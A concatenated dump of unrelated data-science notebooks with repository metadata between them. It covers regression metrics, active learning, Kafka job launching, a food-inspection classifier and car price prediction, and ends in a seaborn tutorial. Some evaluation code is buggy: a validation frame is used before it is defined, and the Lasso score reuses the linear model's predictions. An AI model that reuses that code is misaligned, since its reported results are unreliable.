"## RMSE (Root Mean Squared Error)\n\n\n\n\nSo why we need RMSE?\n\n- To make scale of errors like target scale.\n\n\n`Similarity`: MSE and RMSE are the same minimization. It means if we minize MSE, then we automatically minimize RMSE. \n\n`Difference`: not the same for gradient based models, because of different learning rates. (because 1/(2*sqrt(mse) of second derivative)\n",
"_____no_output_____"
],
[
"# R-squared\n\n\n\n\nR^2 = 0 (not better than baseline)\n\nR^2 = 1 (model explains 100% variability in data, not always means good model)\n\nWe can optimize R-squared by optimizing MSE, RMSE",
"_____no_output_____"
],
[
"# MAE: Mean Abosulte Error\n\n\n\n- Not sensative to outliers, more robust than MSE, not influenced by outliers\n- Mostly used in finance\n\n\nHow to evaluate MAE ?\n\nCompute baseline MAE and compare it with your model, if your model beats baseline.\n\n\n",
"_____no_output_____"
],
[
"# General guide of regression metrics\n\n- If `unusual objects are normal`, not ignore them and use MSE.\n\n- Otherwise, if unusual objects are mistakes (entry mistakes, ETL mistakes, typos) use MAE",
"_____no_output_____"
],
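[
"A small NumPy sketch added to this write-up: it computes the metrics above on toy data, together with their best-constant baselines (mean for MSE/RMSE, median for MAE). The numbers are illustrative only.",
"_____no_output_____"
],
[
"# Toy computation of MSE, RMSE, MAE and R^2, plus their best-constant baselines\nimport numpy as np\n\ny = np.array([10.0, 20.0, 30.0, 1000.0])     # targets (with one unusual object)\ny_hat = np.array([12.0, 18.0, 33.0, 900.0])  # model predictions\n\nmse = np.mean((y - y_hat) ** 2)\nrmse = np.sqrt(mse)\nmae = np.mean(np.abs(y - y_hat))\nr2 = 1 - mse / np.mean((y - y.mean()) ** 2)\n\nbaseline_mse = np.mean((y - y.mean()) ** 2)       # best constant for MSE is the mean\nbaseline_mae = np.mean(np.abs(y - np.median(y)))  # best constant for MAE is the median\n\nprint('MSE', mse, 'RMSE', rmse, 'MAE', mae, 'R2', r2)\nprint('baseline MSE', baseline_mse, 'baseline MAE', baseline_mae)",
"_____no_output_____"
],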
[
"# Regression Metrics for Relative Error\n\nShop 1: predicted 9, sold 10, MSE = 1\n\nShop 2: predicted 999, sold 1000, MSE = 1\n\nIt's clear that Shop 2 did better, even MSE is the same. So we need metric to calculate relative error.\n\nSo if we adjust error to relative error.\n\nShop 1: predicted 9, sold 10, MSE = 1\n\nShop 2: predicted 900, sold 1000, MSE = 10'000\n\nShop 1: predicted 9, sold 10, relative_metric = 1\n\nShop 2: predicted 900, sold 1000, relative_metric = 1\n",
"_____no_output_____"
],
[
"# MSPE: Mean Squared Percentage Error (measures relative error)\n\n\n\n\nTo evaluate MSPE, check if your model beats baseline.\n\n",
"_____no_output_____"
],
[
"# MAPE: Mean Absolute Percentage Error (measures relative error)\n\n\n\nTo evaluate MAPE, check if your model beats baseline. \n\n",
"_____no_output_____"
],
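[
"A companion NumPy sketch added to this write-up for the relative-error metrics: it reproduces the two-shops example and shows that MSPE and MAPE treat a 10% error on a small shop and a 10% error on a large shop the same way.",
"_____no_output_____"
],
[
"# MSPE and MAPE on the two-shops example: both shops are off by 10%\nimport numpy as np\n\ny = np.array([10.0, 1000.0])    # true sales of shop 1 and shop 2\ny_hat = np.array([9.0, 900.0])  # predictions\n\nmspe = 100.0 * np.mean(((y - y_hat) / y) ** 2)\nmape = 100.0 * np.mean(np.abs((y - y_hat) / y))\n\nprint('MSPE (%):', mspe)  # both shops contribute the same relative error\nprint('MAPE (%):', mape)",
"_____no_output_____"
],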
[
"# RMSLE: Root Mean Square Logaritmic Error (measures relative error)\n\n\n\n\nTo evalute, compare with baseline. Best constant - `exp(y_target_mean)` instead of y_hat",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb2a86d0df583f9c12175c2c0b5278f4e5e473d1 | 70,521 | ipynb | Jupyter Notebook | example.ipynb | theodore-ando/active-learning | c0be13cf93ee172ebb7eee2a87c390d209b12bd8 | [
"Apache-2.0"
] | 5 | 2018-08-30T18:55:00.000Z | 2019-04-11T02:20:06.000Z | example.ipynb | theodore-ando/active-learning | c0be13cf93ee172ebb7eee2a87c390d209b12bd8 | [
"Apache-2.0"
] | 1 | 2018-10-05T22:17:14.000Z | 2018-10-05T22:17:14.000Z | example.ipynb | theodore-ando/active-learning | c0be13cf93ee172ebb7eee2a87c390d209b12bd8 | [
"Apache-2.0"
] | 2 | 2018-09-19T20:45:40.000Z | 2022-03-31T06:57:30.000Z | 208.642012 | 24,656 | 0.921683 | [
[
[
"# Example of simple use of active learning API\nCompare 3 query strategies: random sampling, uncertainty sampling, and active search.\nObserve how we trade off between finding targets and accuracy.",
"_____no_output_____"
],
[
"# Imports",
"_____no_output_____"
]
],
[
[
"import warnings\nwarnings.filterwarnings(action='ignore', category=RuntimeWarning)\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nfrom sklearn.base import clone\nfrom sklearn.datasets import make_moons\nfrom sklearn.svm import SVC\n\nimport active_learning\nfrom active_learning.utils import *\nfrom active_learning.query_strats import random_sampling, uncertainty_sampling, active_search\n\n%matplotlib inline",
"_____no_output_____"
],
[
"np.random.seed(0)",
"_____no_output_____"
]
],
[
[
"# Load toy data",
"_____no_output_____"
],
[
"Have a little binary classification task that is not linearly separable.",
"_____no_output_____"
]
],
[
[
"X, y = make_moons(noise=0.1, n_samples=200)",
"_____no_output_____"
],
[
"plt.scatter(X[y==0,0], X[y==0,1])\nplt.scatter(X[y==1,0], X[y==1,1])",
"_____no_output_____"
]
],
[
[
"# Training Models",
"_____no_output_____"
]
],
[
[
"# Our basic classifier will be a SVM with rbf kernel\nbase_clf = SVC(probability=True)\n\n# size of the initial labeled set\ninit_L_size = 5\n\n# Make 30 queries\nn_queries = 30\n\n# set random state for consistency in training data\nrandom_state = 123",
"_____no_output_____"
]
],
[
[
"### Random Sampling",
"_____no_output_____"
]
],
[
[
"random_experiment_data = perform_experiment(\n X, y, \n base_estimator=clone(base_clf), \n query_strat=random_sampling,\n n_queries=n_queries,\n init_L_size=init_L_size,\n random_state=random_state\n)",
"100%|██████████| 30/30 [00:00<00:00, 650.20it/s]\n"
]
],
[
[
"### Uncertainty Sampling",
"_____no_output_____"
]
],
[
[
"uncertainty_experiment_data = perform_experiment(\n X, y,\n base_estimator=clone(base_clf),\n query_strat=uncertainty_sampling,\n n_queries=n_queries,\n init_L_size=init_L_size,\n random_state=random_state\n)",
"100%|██████████| 30/30 [00:00<00:00, 506.46it/s]\n"
]
],
[
[
"### Active Search",
"_____no_output_____"
]
],
[
[
"as_experiment_data = perform_experiment(\n X, y,\n base_estimator=clone(base_clf),\n query_strat=active_search,\n n_queries=n_queries,\n init_L_size=init_L_size,\n random_state=random_state\n)",
"100%|██████████| 30/30 [00:10<00:00, 3.00it/s]\n"
]
],
[
[
"# Compare",
"_____no_output_____"
]
],
[
[
"xx = np.arange(n_queries)\n\nplt.plot(xx, random_experiment_data[\"accuracy\"], label=\"Random\")\nplt.plot(xx, uncertainty_experiment_data[\"accuracy\"], label=\"Uncertainty\")\nplt.plot(xx, as_experiment_data[\"accuracy\"], label=\"AS\")\n\nplt.title(\"Accuracy on Test Set vs Num Queries\")\nplt.ylabel(\"accuracy\")\nplt.xlabel(\"# queries\")\nplt.legend()",
"_____no_output_____"
],
[
"plt.plot(xx, random_experiment_data[\"history\"], label=\"Random\")\nplt.plot(xx, uncertainty_experiment_data[\"history\"], label=\"Uncertainty\")\nplt.plot(xx, as_experiment_data[\"history\"], label=\"AS\")\n\nplt.title(\"Number of targets found\")\nplt.ylabel(\"# of targets\")\nplt.xlabel(\"# queries\")\nplt.legend()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2a99c49f4cefb3df2ef6ed082cef95d2f53c3c | 4,412 | ipynb | Jupyter Notebook | src/hostedkafka/Start_Experiments.ipynb | MariamBARRY/streaming-online-learning | b26a4e1c9e901eb9d45d7651ad7718a190c916ee | [
"Apache-2.0"
] | 1 | 2021-04-26T21:37:45.000Z | 2021-04-26T21:37:45.000Z | src/hostedkafka/Start_Experiments.ipynb | MariamBARRY/streaming-online-learning | b26a4e1c9e901eb9d45d7651ad7718a190c916ee | [
"Apache-2.0"
] | 3 | 2021-04-01T16:27:47.000Z | 2021-04-05T15:44:23.000Z | src/hostedkafka/Start_Experiments.ipynb | MariamBARRY/streaming-online-learning | b26a4e1c9e901eb9d45d7651ad7718a190c916ee | [
"Apache-2.0"
] | 2 | 2021-03-09T16:50:15.000Z | 2021-04-01T12:31:36.000Z | 27.067485 | 81 | 0.373527 | [
[
[
"# Start experiments",
"_____no_output_____"
]
],
[
[
"from time import sleep\nfrom domino import Domino\ndomino = Domino(\"katie_shakman/river-ml\")",
"_____no_output_____"
],
[
"# Arguments: \n# num_partitions_per_job, \n# list_of_partitions, \n# request_topic, \n# inference_topic, \n# bootstrap_servers # temporarily removed argument\n# model_name # ex: HoeffdingTreeClassifier30 # temporarily removed argument",
"_____no_output_____"
]
],
[
[
"#### One Job, Eight Partitions",
"_____no_output_____"
]
],
[
[
"domino.runs_start([\"kafka_consumer_v2.py\", # Fill in with script name \n \"8\", \n \"[0,1,2,3,4,5,6,7]\", \n \"T8\", \n \"I16\", \n \"group_5\"\n ], \n title=\"Using 8 Partitions Per Job\")",
"_____no_output_____"
]
],
[
[
"#### Two Jobs, Four Partitions Per Job",
"_____no_output_____"
]
],
[
[
"domino.runs_start([\"kafka_consumer_v2.py\", # Fill in with script name \n \"4\", \n \"[0,1,2,3]\", \n \"T8\", \n \"I17\", \n \"group_2\"\n ], \n title=\"Using 4 Partitions Per Job\")\ndomino.runs_start([\"kafka_consumer_v2.py\", \n \"4\", \n \"[4,5,6,7]\", \n \"T8\", \n \"I17\", \n \"group_2\"\n ], \n title=\"Using 4 Partitions Per Job\")",
"_____no_output_____"
]
],
[
[
"#### Four Jobs, Two Partitions Per Job",
"_____no_output_____"
]
],
[
[
"domino.runs_start([\"kafka_consumer_v2.py\", # Fill in with script name \n \"2\", \n \"[0,1]\", \n \"T8\", \n \"I18\", \n \"group_3\"\n ], \n title=\"Using 2 Partitions Per Job\")\n\ndomino.runs_start([\"kafka_consumer_v2.py\", \n \"2\", \n \"[2,3]\", \n \"T8\", \n \"I18\", \n \"group_3\"\n ], \n title=\"Using 2 Partitions Per Job\")\n\ndomino.runs_start([\"kafka_consumer_v2.py\", \n \"2\", \n \"[4,5]\", \n \"T8\", \n \"I18\", \n \"group_3\"\n ], \n title=\"Using 2 Partitions Per Job\")\n\ndomino.runs_start([\"kafka_consumer_v2.py\", \n \"2\", \n \"[6,7]\", \n \"T8\", \n \"I18\", \n \"group_3\"\n ], \n title=\"Using 2 Partitions Per Job\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2aa016de3a1bceb5ff4e73cb5d4445473c96eb | 102,899 | ipynb | Jupyter Notebook | Gagan_Singh_DS11_Sprint_Challenge_7.ipynb | gagansingh23/DS-Unit-2-Applied-Modeling | 883b6cd290c679e33318c1781130291f90776c12 | [
"MIT"
] | null | null | null | Gagan_Singh_DS11_Sprint_Challenge_7.ipynb | gagansingh23/DS-Unit-2-Applied-Modeling | 883b6cd290c679e33318c1781130291f90776c12 | [
"MIT"
] | null | null | null | Gagan_Singh_DS11_Sprint_Challenge_7.ipynb | gagansingh23/DS-Unit-2-Applied-Modeling | 883b6cd290c679e33318c1781130291f90776c12 | [
"MIT"
] | null | null | null | 129.92298 | 46,492 | 0.840105 | [
[
[
"<a href=\"https://colab.research.google.com/github/gagansingh23/DS-Unit-2-Applied-Modeling/blob/master/Gagan_Singh_DS11_Sprint_Challenge_7.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"_Lambda School Data Science, Unit 2_\n\n# Applied Modeling Sprint Challenge: Predict Chicago food inspections 🍕",
"_____no_output_____"
],
[
"For this Sprint Challenge, you'll use a dataset with information from inspections of restaurants and other food establishments in Chicago from January 2010 to March 2019. \n\n[See this PDF](https://data.cityofchicago.org/api/assets/BAD5301B-681A-4202-9D25-51B2CAE672FF) for descriptions of the data elements included in this dataset.\n\nAccording to [Chicago Department of Public Health — Food Protection Services](https://www.chicago.gov/city/en/depts/cdph/provdrs/healthy_restaurants/svcs/food-protection-services.html), \"Chicago is home to 16,000 food establishments like restaurants, grocery stores, bakeries, wholesalers, lunchrooms, mobile food vendors and more. Our business is food safety and sanitation with one goal, to prevent the spread of food-borne disease. We do this by inspecting food businesses, responding to complaints and food recalls.\" ",
"_____no_output_____"
],
[
"#### Your challenge: Predict whether inspections failed\n\nThe target is the `Fail` column.\n\n- When the food establishment failed the inspection, the target is `1`.\n- When the establishment passed, the target is `0`.",
"_____no_output_____"
],
[
"#### Run this cell to install packages in Colab:",
"_____no_output_____"
]
],
[
[
"%%capture\nimport sys\n\nif 'google.colab' in sys.modules:\n # Install packages in Colab\n !pip install category_encoders==2.*\n !pip install eli5\n !pip install pandas-profiling==2.*\n !pip install pdpbox\n !pip install shap",
"_____no_output_____"
]
],
[
[
"#### Run this cell to load the data:",
"_____no_output_____"
]
],
[
[
"import pandas as pd\n\ntrain_url = 'https://drive.google.com/uc?export=download&id=13_tP9JpLcZHSPVpWcua4t2rY44K_s4H5'\ntest_url = 'https://drive.google.com/uc?export=download&id=1GkDHjsiGrzOXoF_xcYjdzBTSjOIi3g5a'\n\ntrain = pd.read_csv(train_url)\ntest = pd.read_csv(test_url)\n\nassert train.shape == (51916, 17)\nassert test.shape == (17306, 17)",
"_____no_output_____"
],
[
"#Installers\nimport category_encoders as ce\nfrom sklearn.model_selection import train_test_split\nfrom xgboost import XGBClassifier\nfrom sklearn.metrics import roc_auc_score\nfrom pdpbox.pdp import pdp_isolate, pdp_plot\nimport matplotlib.pyplot as plt\nfrom pdpbox.pdp import pdp_interact, pdp_interact_plot",
"_____no_output_____"
]
],
[
[
"### Part 1: Preprocessing\n\nYou may choose which features you want to use, and whether/how you will preprocess them. If you use categorical features, you may use any tools and techniques for encoding.\n\n_To earn a score of 3 for this part, find and explain leakage. The dataset has a feature that will give you an ROC AUC score > 0.90 if you process and use the feature. Find the leakage and explain why the feature shouldn't be used in a real-world model to predict the results of future inspections._\n\n### Part 2: Modeling\n\n**Fit a model** with the train set. (You may use scikit-learn, xgboost, or any other library.) Use cross-validation or do a three-way split (train/validate/test) and **estimate your ROC AUC** validation score.\n\nUse your model to **predict probabilities** for the test set. **Get an ROC AUC test score >= 0.60.**\n\n_To earn a score of 3 for this part, get an ROC AUC test score >= 0.70 (without using the feature with leakage)._\n\n\n### Part 3: Visualization\n\nMake visualizations for model interpretation. (You may use any libraries.) Choose two of these types:\n\n- Confusion Matrix\n- Permutation Importances\n- Partial Dependence Plot, 1 feature isolation\n- Partial Dependence Plot, 2 features interaction\n- Shapley Values\n\n_To earn a score of 3 for this part, make four of these visualization types._",
"_____no_output_____"
],
[
"## Part 1: Preprocessing\n\n> You may choose which features you want to use, and whether/how you will preprocess them. If you use categorical features, you may use any tools and techniques for encoding.",
"_____no_output_____"
]
],
[
[
"#Feature Selection\ntrain.describe(exclude='number').nunique()\n",
"_____no_output_____"
],
[
"train.columns",
"_____no_output_____"
],
[
"train.Fail.value_counts(normalize=True)",
"_____no_output_____"
],
[
"train_pratice = train[train['Violations'].str.contains(\"HAZARD\", na=False)]\ntrain_pratice.Fail.value_counts(normalize=True)",
"_____no_output_____"
],
[
"target = 'Fail'\ntrain_features = train.drop(columns=[target])\n\ncardinality = train_features.select_dtypes(exclude='number').nunique()\ncategorical_features = cardinality[cardinality <= 40].index.tolist()\nnumerical_features = train_features.select_dtypes(include='number').columns.tolist()\ncategorical_features",
"_____no_output_____"
],
[
"features = categorical_features + numerical_features",
"_____no_output_____"
],
[
"X_train = train[features]\ny_train = train[target]\n\nX_val = val[features]\ny_val = val[target]\n\nX_test = test[features]\ny_test = test[features]",
"_____no_output_____"
],
[
"#One Hot Encode all categorical variables with low cardinality\nencoder = ce.OneHotEncoder()\nX_train_encoded = encoder.fit_transform(X_train)\nX_val_encoded = encoder.transform(X_val)",
"_____no_output_____"
]
],
[
[
"## Part 2: Modeling\n\n> **Fit a model** with the train set. (You may use scikit-learn, xgboost, or any other library.) Use cross-validation or do a three-way split (train/validate/test) and **estimate your ROC AUC** validation score.\n>\n> Use your model to **predict probabilities** for the test set. **Get an ROC AUC test score >= 0.60.**",
"_____no_output_____"
]
],
[
[
"#Perform a three way split\ntrain, val = train_test_split(train, train_size=0.90, test_size=0.10, \n stratify=train['Fail'], random_state=42)\n\n\ntrain.shape, val.shape, test.shape",
"_____no_output_____"
],
[
"#Fit The Model \nmodel = XGBClassifier(n_estimators=100, n_jobs=-1)\n\nmodel.fit(X_train_encoded, y_train)",
"_____no_output_____"
],
[
"#prediction on train set\ny_pred = model.predict(X_val_encoded)\n\n\nroc_auc_score(y_val, y_pred)",
"_____no_output_____"
],
[
"#Since its classifier, we need to use predicted probailities not discrete. \ny_pred_proba = model.predict_proba(X_val_encoded)[:,-1]\nprint('Test ROC Score', roc_auc_score(y_val, y_pred_proba))",
"Test ROC Score 0.7166206725605222\n"
]
],
[
[
"## Part 3: Visualization\n\n> Make visualizations for model interpretation. (You may use any libraries.) Choose two of these types:\n>\n> - Permutation Importances\n> - Partial Dependence Plot, 1 feature isolation\n> - Partial Dependence Plot, 2 features interaction\n> - Shapley Values",
"_____no_output_____"
],
[
"**Partial Dependance Plot, 1 feature isolation**",
"_____no_output_____"
]
],
[
[
"features",
"_____no_output_____"
],
[
"target = 'Fail'\nfeatures = train.columns.drop([target])\n\nX = train[features]\ny = train[target]\n\nencoder = ce.OrdinalEncoder()\nX_encoded = encoder.fit_transform(X)\n\nmodel = XGBClassifier(n_estimators=100, random_state=42, n_jobs=-1)\nmodel.fit(X_encoded, y)",
"_____no_output_____"
],
[
"from pdpbox import pdp\nfeature = 'Risk'\n\npdp_dist = pdp.pdp_isolate(model=model, dataset=X_encoded, model_features=features,\n feature=feature)\n\npdp.pdp_plot(pdp_dist, feature);",
"findfont: Font family ['Arial'] not found. Falling back to DejaVu Sans.\nfindfont: Font family ['Arial'] not found. Falling back to DejaVu Sans.\nfindfont: Font family ['Arial'] not found. Falling back to DejaVu Sans.\nfindfont: Font family ['Arial'] not found. Falling back to DejaVu Sans.\n"
]
],
[
[
"**Partial Dependance Plot, 2 Feature Interaction**\n",
"_____no_output_____"
]
],
[
[
"features = ['Risk', 'Inspection Type']\n\ninteractions = pdp_interact(\n model=model,\n dataset=X_encoded,\n model_features=X_encoded.columns,\n features=features\n)\npdp_interact_plot(interactions, plot_type='grid', feature_names=features);",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2aa33fedbb9be43ab1694c41e6aabdad0d5f92 | 14,336 | ipynb | Jupyter Notebook | Car_Price_Prediction_.ipynb | aruanalucena/Car-Price-Prediction-Machine-Learning | 592ba604cc5d048f80fdd15bc40d80a42fecf25a | [
"MIT"
] | 2 | 2021-07-21T20:07:07.000Z | 2021-07-21T20:07:08.000Z | Car_Price_Prediction_.ipynb | aruanalucena/Car-Price-Prediction-Machine-Learning | 592ba604cc5d048f80fdd15bc40d80a42fecf25a | [
"MIT"
] | null | null | null | Car_Price_Prediction_.ipynb | aruanalucena/Car-Price-Prediction-Machine-Learning | 592ba604cc5d048f80fdd15bc40d80a42fecf25a | [
"MIT"
] | null | null | null | 23.656766 | 268 | 0.467146 | [
[
[
"<a href=\"https://colab.research.google.com/github/aruanalucena/Car-Price-Prediction-Machine-Learning/blob/main/Car_Price_Prediction_.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# **Car Price Prediction with python**.\n# **Previsão de carrro com Python**.\n",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"%%html\n<h1><marquee style='width: 100% ', font color= 'arrows';><b>Car Price Prediction </b></marquee></h1>",
"_____no_output_____"
]
],
[
[
"# Importing the Dependencies\n# <font color = 'blue'> Importando as bibliotecas\n***",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Lasso\nfrom sklearn import metrics",
"_____no_output_____"
]
],
[
[
"# Data Collection and Data Analisys\n# <font color='blue'> Coleta e Análise dos Dados\n\n- loading the data from csv file to pandas DataFrame\n-<font color='blue'> Carregando o dados em csv para o pandas DataFrame\n***",
"_____no_output_____"
]
],
[
[
"car_data= pd.read_csv('/content/car data.csv')",
"_____no_output_____"
],
[
"print(car_data)",
"_____no_output_____"
],
[
"car_data.head()",
"_____no_output_____"
]
],
[
[
"- Checking the number of rows and columns in the data frame\n-<font color='blue'> Checando numero de linhas e colunas do data frame\n***",
"_____no_output_____"
]
],
[
[
"car_data.shape",
"_____no_output_____"
]
],
[
[
"- Getting some information about the dataset\n-<font color='blue'> Pegando algumas informações dos dados\n***",
"_____no_output_____"
]
],
[
[
"car_data.info()",
"_____no_output_____"
]
],
[
[
"- Checking the number of missing values \n-<font color='blue'> Checando o numero de valores faltantes\n***",
"_____no_output_____"
]
],
[
[
"car_data.isnull().sum()",
"_____no_output_____"
]
],
[
[
"- Checking the distribution of categorical data\n-<font color='blue'> Checando a distribuição dos dados categoricos\n***",
"_____no_output_____"
]
],
[
[
"print(car_data.Fuel_Type.value_counts())\nprint(car_data.Seller_Type.value_counts())\nprint(car_data.Transmission.value_counts())",
"_____no_output_____"
]
],
[
[
"- Encoding the Categorical Data\n- <font color='blue'> Codificação de dados categoricos\n",
"_____no_output_____"
]
],
[
[
"# encoding \"Fuel_Type\"Column\ncar_data.replace({'Fuel_Type' :{'Petrol':0,'Diesel':1,'CNG':2}},inplace=True)\n\n# encoding \"Seller_Type\"Column\ncar_data.replace({'Seller_Type' :{'Dealer':0,'Individual':1}},inplace=True)\n\n# encoding \"Transmission\"Column\ncar_data.replace({'Transmission' :{'Manual':0,'Automatic':1}},inplace=True)",
"_____no_output_____"
],
[
"car_data.head()",
"_____no_output_____"
]
],
[
[
"- Splitting the data into Training data and Test data\n- <font color='blue'> Divisão do dados en treino e teste\n***",
"_____no_output_____"
]
],
[
[
"X = car_data.drop(['Car_Name', 'Selling_Price'], axis=1)\n\nY = car_data['Selling_Price']",
"_____no_output_____"
],
[
"print(X)\nprint(Y)",
"_____no_output_____"
]
],
[
[
"- Splitting the data target\n- <font color='blue'> \n***\n",
"_____no_output_____"
]
],
[
[
"X_train, X_test, Y_train, Y_test = train_test_split(X,Y, test_size=0.1, random_state=2)",
"_____no_output_____"
]
],
[
[
"- Model Training --> Linear Regression\n-<font color='blue'>Modelo de Treino --> Linear regression \n***",
"_____no_output_____"
],
[
"# Construindo o Modelo \n- Training the Model\n-<font color='blue'> Treinando o Modelo\n***",
"_____no_output_____"
],
[
"- Loading the Model\n- <font color='blue'>Carregando o Modelo",
"_____no_output_____"
]
],
[
[
"lin_reg_model = LinearRegression()",
"_____no_output_____"
],
[
"lin_reg_model.fit(X_train, Y_train)",
"_____no_output_____"
]
],
[
[
"# Avaliação do Modelo",
"_____no_output_____"
],
[
"- Model Evaluation\n-<font color='blue'>Avaliação do Modelo\n\n- Accuracy on training data\n- <font color = 'blue'>Precisão dos dados de treino\n*** ",
"_____no_output_____"
]
],
[
[
"train_data_prediction = lin_reg_model.predict(X_train)\nprint(train_data_prediction)",
"_____no_output_____"
]
],
[
[
"- R squared error\n- <font color = 'blue'>R erro quadratico\n***",
"_____no_output_____"
]
],
[
[
"error_score = metrics.r2_score(Y_train, train_data_prediction)\nprint(' R squared Error : ', error_score)\n",
"_____no_output_____"
]
],
[
[
"- Visualizing the actual Prices and predicted prices\n- <font color = 'blue'>Visualização dos preços reais e dos preços previstos\n***",
"_____no_output_____"
]
],
[
[
"plt.scatter(Y_train, train_data_prediction)\nplt.xlabel( 'Actual Prices/Preço Atual')\nplt.ylabel('Predicted Prices / Preço Previsto')\nplt.title('Actual prices vs Predicted Price')\nplt.show()\n",
"_____no_output_____"
],
[
"test_data_prediction = lin_reg_model.predict(X_test)",
"_____no_output_____"
],
[
"error_score = metrics.r2_score(Y_test, test_data_prediction)\nprint(\" R squared Error : \", error_score)",
"_____no_output_____"
],
[
"plt.scatter(Y_test, test_data_prediction)\nplt.xlabel( 'Actual Prices/Preço Atual')\nplt.ylabel('Predicted Prices / Preço Previsto')\nplt.title('Actual prices vs Predicted Price')\nplt.show()",
"_____no_output_____"
]
],
[
[
"# Lasso Regression",
"_____no_output_____"
]
],
[
[
"lass_reg_model = Lasso()",
"_____no_output_____"
],
[
"lass_reg_model.fit(X_train, Y_train)",
"_____no_output_____"
],
[
"train_data_prediction = lass_reg_model.predict(X_train)\nprint(train_data_prediction)",
"_____no_output_____"
],
[
"train_data_prediction= lass_reg_model.predict(X_train)",
"_____no_output_____"
],
[
"error_score = metrics.r2_score(Y_test, test_data_prediction)\nprint(' R squared Error : ', error_score)",
"_____no_output_____"
],
[
"plt.scatter(Y_test, test_data_prediction)\nplt.xlabel( 'Actual Prices/Preço Atual')\nplt.ylabel('Predicted Prices / Preço Previsto')\nplt.title('Actual prices vs Predicted Price')\nplt.show()",
"_____no_output_____"
]
],
[
[
"# The end\n***",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2aa6b556e689dbe8b4e80c5c6801976f401c6f | 22,590 | ipynb | Jupyter Notebook | doc/tutorial/axis_grids.ipynb | yaoxingcheng/seaborn | 37147cf9dfeee1bfc0fabf26da3ad197769f9b41 | [
"BSD-3-Clause"
] | 2 | 2019-05-27T04:32:12.000Z | 2019-06-10T15:28:22.000Z | doc/tutorial/axis_grids.ipynb | nils-werner/seaborn | b9551aff1e2b020542a5fb610fec468b69b87c6e | [
"MIT",
"BSD-3-Clause"
] | null | null | null | doc/tutorial/axis_grids.ipynb | nils-werner/seaborn | b9551aff1e2b020542a5fb610fec468b69b87c6e | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-05-16T20:55:34.000Z | 2020-05-16T20:55:34.000Z | 37.277228 | 1,059 | 0.616246 | [
[
[
".. _grid_tutorial:\n\n.. currentmodule:: seaborn",
"_____no_output_____"
],
[
"Building structured multi-plot grids\n====================================\n\n.. raw:: html\n\n <div class=col-md-9>\n",
"_____no_output_____"
],
[
"When exploring medium-dimensional data, a useful approach is to draw multiple instances of the same plot on different subsets of your dataset. This technique is sometimes called either \"lattice\" or \"trellis\" plotting, and it is related to the idea of `\"small multiples\" <https://en.wikipedia.org/wiki/Small_multiple>`_. It allows a viewer to quickly extract a large amount of information about complex data. Matplotlib offers good support for making figures with multiple axes; seaborn builds on top of this to directly link the structure of the plot to the structure of your dataset.\n\nTo use these features, your data has to be in a Pandas DataFrame and it must take the form of what Hadley Whickam calls `\"tidy\" data <https://vita.had.co.nz/papers/tidy-data.pdf>`_. In brief, that means your dataframe should be structured such that each column is a variable and each row is an observation.\n\nFor advanced use, you can use the objects discussed in this part of the tutorial directly, which will provide maximum flexibility. Some seaborn functions (such as :func:`lmplot`, :func:`catplot`, and :func:`pairplot`) also use them behind the scenes. Unlike other seaborn functions that are \"Axes-level\" and draw onto specific (possibly already-existing) matplotlib ``Axes`` without otherwise manipulating the figure, these higher-level functions create a figure when called and are generally more strict about how it gets set up. In some cases, arguments either to those functions or to the constructor of the class they rely on will provide a different interface attributes like the 